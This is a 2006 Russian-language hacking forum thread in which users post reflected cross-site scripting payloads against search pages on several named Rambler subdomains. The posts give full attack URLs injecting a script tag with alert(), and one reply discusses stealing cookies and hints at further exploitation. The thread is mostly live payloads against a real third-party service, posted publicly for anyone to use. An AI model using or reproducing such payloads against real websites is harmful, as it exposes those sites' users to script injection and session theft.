XSS на Rambler

Discussion in 'Уязвимости' started by D=P=CH= MOD=, 8 Oct 2006.

  1. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    Вот нашел на Рамблере

    Code:
    http://planeta.rambler.ru/srch?words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&set=&sort=6&cc=%CA%EE%ED%F2%F0%EE%EB%FC&old_q=
    В поиск по планетам вводим
    "><script>alert("xss")</script>
     
    #1 D=P=CH= MOD=, 8 Oct 2006
    Last edited: 8 Oct 2006
  2. KoTeG

    KoTeG Banned

    Joined:
    29 Apr 2006
    Messages:
    198
    Likes Received:
    165
    Reputations:
    2
    А в теме Xss трудно было запостить !? Надо было обязательно создавать отдельную тему !? Мда ...
     
    #2 KoTeG, 8 Oct 2006
  3. D=P=CH= MOD=

    D=P=CH= MOD= Elder - Старейшина

    Joined:
    15 Aug 2006
    Messages:
    249
    Likes Received:
    195
    Reputations:
    15
    Котег сори за отдельную тему))

    Вот тоже с Рамблера
    поисковый запрос

    Code:
    http://f1.rambler.ru/srch/?sort=1&control_charset=%EB%CF%CE%D4%D2%CF%CC%D8&words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
    Атак же при двойном запросе в
    http://finance.rambler.ru/db/instrsearch.html

    При запросе поиска фото

    Code:
    http://foto.rambler.ru/srch?control_charset=%CA%EE%ED%F2%F0%EE%EB%FC&sort=0&set=photo&words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
     
    #3 D=P=CH= MOD=, 8 Oct 2006
    Last edited: 8 Oct 2006
  4. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Это все хорошо, но помойму от них пользы мало. В куках то пароля нету...

    ЗЫ Кажется первую багу уже залатали =-О

    Добавил
    Упс, уже сам догадался для чего такую багу заюзать =)
     
    #4 Fr-Ron, 8 Oct 2006
    Last edited: 8 Oct 2006
(You must log in or sign up to post here.)